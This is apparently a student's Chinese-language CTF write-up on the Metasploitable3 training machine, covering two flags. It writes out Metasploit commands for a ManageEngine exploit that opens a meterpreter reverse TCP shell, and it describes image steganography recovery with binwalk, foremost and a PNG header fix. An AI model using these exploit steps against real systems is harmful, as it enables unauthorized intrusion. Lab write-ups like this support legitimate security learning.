Metasploitable3-flag
写这个文章是因老师给了我一个Metasploitable3的靶机,就来搞搞玩玩,然后经过不断地乱撞,最终搞到了15个flag,以下是我寻找15个flag的过程,希望小白的文章能对大家有所帮助。
ace_of_hearts
1.ace_of_hearts
这里刚刚拿到靶场环境,就随便翻了翻电脑里的文件,发现了一张红桃A
然后感觉这应该就是一个flag,打开kali尝试连接该靶机172.21.11.227.
先nmap扫一下,发现了8022端口可以搞一搞
然后打开msf,设置相应的payload,rhost,lhost,target,rport
相关命令:use exploit/windows/http/manageenine_connectionid_write
Set rhosts 172.21.11.227
Set rport 8022
Set lhost 192.168.17.128
Set payload windows/meterpreter/reverse_tcp
设置好相应的参数之后run起来
成功拿到shell
然后进入在靶机发现flag的目录下
下载ace_of_hearts.jpg之后发现还有一个ten_of_diamonds.png也下载下来为下一个flag做打算,
下载ace_of_hearts.jpg之后发现并非flag格式,尝试查看是不是隐写。
利用binwalk发现确实是隐写,里面有一个ace_of_hearts.png文件,接下来利用foremost将图片分离出来,拿到flag。
ten_of_diamonds
在寻找ace的过程中,我们同时下载了ten_of_diamonds.png
但是这个png文件并不能如愿显示flag,由此推断可能是文件里的图片编码被改,这是常见的图片隐写方式。
下面我们用winhex打开刚刚找到的flag:ace_of_hearts.png
再打开ten_of_diamonds.png对比
诶,这就发现了ten_of_diamonds.png的文件头编码不对,并不符合png图片头编码89 50 4E 47。
接下来我们改成一致的编码头,得到了flag
好了,前两个flag就先到这里了。希望大佬们看了能发表更好的意见指导一下小白。